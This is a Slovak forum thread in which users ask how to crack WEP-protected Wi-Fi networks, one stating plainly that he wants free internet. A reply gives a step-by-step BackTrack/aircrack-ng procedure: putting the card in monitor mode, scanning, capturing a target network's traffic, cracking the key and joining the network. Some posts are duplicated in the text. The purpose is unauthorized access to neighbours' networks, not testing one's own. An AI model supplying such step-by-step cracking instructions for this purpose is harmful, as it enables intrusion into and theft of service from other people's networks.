prelomenie WEP s backtrackom3
prelomenie WEP
Potreboval by som nejaky SW na windows XP, ktory ma dostane do wireless siete zabezpecenej pomocou WEP ci uz 40/64 alebo 128 alebo 256 Bit
Hladal som na Hojkovi ale nic som nenasiel tak ak niekto o niecom viete dajte mi prosim vediet...Ale potrebujem to na Windows
Airopeek nechcem a ani Cain Abel nechcem
Tak ak viete o niecom inom
Vdaka
Hladal som na Hojkovi ale nic som nenasiel tak ak niekto o niecom viete dajte mi prosim vediet...Ale potrebujem to na Windows
Airopeek nechcem a ani Cain Abel nechcem
Tak ak viete o niecom inom
Vdaka
-
sulo34
Medium Star
- Kontaktovať používateľa:
prelomenie WEP s backtrackom3
cavte seci co ste ochotni poradit,potrebujem zlomit wep key s backtrackom 3 avsak nemam cas sa v tom tyzden hrabat kde co treba spustit a a kde pouzit jaky prikaz a ako hrabat sa v anglickych manualoch, nemozete tu dat navod po slovensky napisany niejakym obycajnym uzivatelom , jednoduchy, nech to bude pre setkych ved zlomenie wepu by mala byt minutova zalezitost
a popri tom navode by som sa chcel este spytat :
1, ako zistim kolko bitove sifrovanie siet pouziva (alebo je to pri lamani jedno ?)
2, ak sa pripajam na niejaku siet mam mac adresu, ip , masku, branu ako zistim DNS , da sa to v backtracku niejak jednoducho .. alebo su niejake univerzalne DNS servery ?
3, ked zlomim kluc potrebujem sa este babrat so zistovanim ip, mac a podbnymi dristami ?
ide mi len o internet zadarmenko
a popri tom navode by som sa chcel este spytat :
1, ako zistim kolko bitove sifrovanie siet pouziva (alebo je to pri lamani jedno ?)
2, ak sa pripajam na niejaku siet mam mac adresu, ip , masku, branu ako zistim DNS , da sa to v backtracku niejak jednoducho .. alebo su niejake univerzalne DNS servery ?
3, ked zlomim kluc potrebujem sa este babrat so zistovanim ip, mac a podbnymi dristami ?
ide mi len o internet zadarmenko
Takže takto. Keď chceš prelomiť tak najpr pustiš sieťovku
iwconfig
potom dáš
airmon-ng start wlan0 // ty môžeš mať íné
potom oscanuješ siete
airodump-ng wlan0
nájdeš neakú s dobrým signálom dajme tomu že má mac 00:11:22:33:44:55 a nazov lamer_net potom
airodump-ng --bbsid 00:11:22:33:44:55 -c 6 -w subor wlan0
-c je channel
-w je zabisuje do suboru s nazvom subor
Potom keď uvidíš data viac ako 20 000
tak dáš
aircrak-ng subor*
Potom ked budeš mať web kluč pripojiš sa na sieť
ifconfig wlan0 up
iwconfig wlan0 mode managed
iwconfig essid lamer_net (Ty dáš inú)
iwconfig wlan0 key wep kúč.
Veľa štastia.
Potom sú také srandy ako packer injection na viac dat atď.
Ak máš neaké otázky pýtaj sa.
iwconfig
potom dáš
airmon-ng start wlan0 // ty môžeš mať íné
potom oscanuješ siete
airodump-ng wlan0
nájdeš neakú s dobrým signálom dajme tomu že má mac 00:11:22:33:44:55 a nazov lamer_net potom
airodump-ng --bbsid 00:11:22:33:44:55 -c 6 -w subor wlan0
-c je channel
-w je zabisuje do suboru s nazvom subor
Potom keď uvidíš data viac ako 20 000
tak dáš
aircrak-ng subor*
Potom ked budeš mať web kluč pripojiš sa na sieť
ifconfig wlan0 up
iwconfig wlan0 mode managed
iwconfig essid lamer_net (Ty dáš inú)
iwconfig wlan0 key wep kúč.
Veľa štastia.
Potom sú také srandy ako packer injection na viac dat atď.
Ak máš neaké otázky pýtaj sa.
-
sulo34
Medium Star
- Kontaktovať používateľa:
dakujem taky navod som si predstavoval vyskusat momentalne nemam cas zajtra mam tazky den a na sietach ani nieje taky traffic a aj niektore nebezia .. sobotu to vsetko vyskusam a ked mi mozes dat takyto navod aj na to s injektovanim .. pocul som ze ten je "lepsi" ak to nieje navod na 5 stran
co asi nebude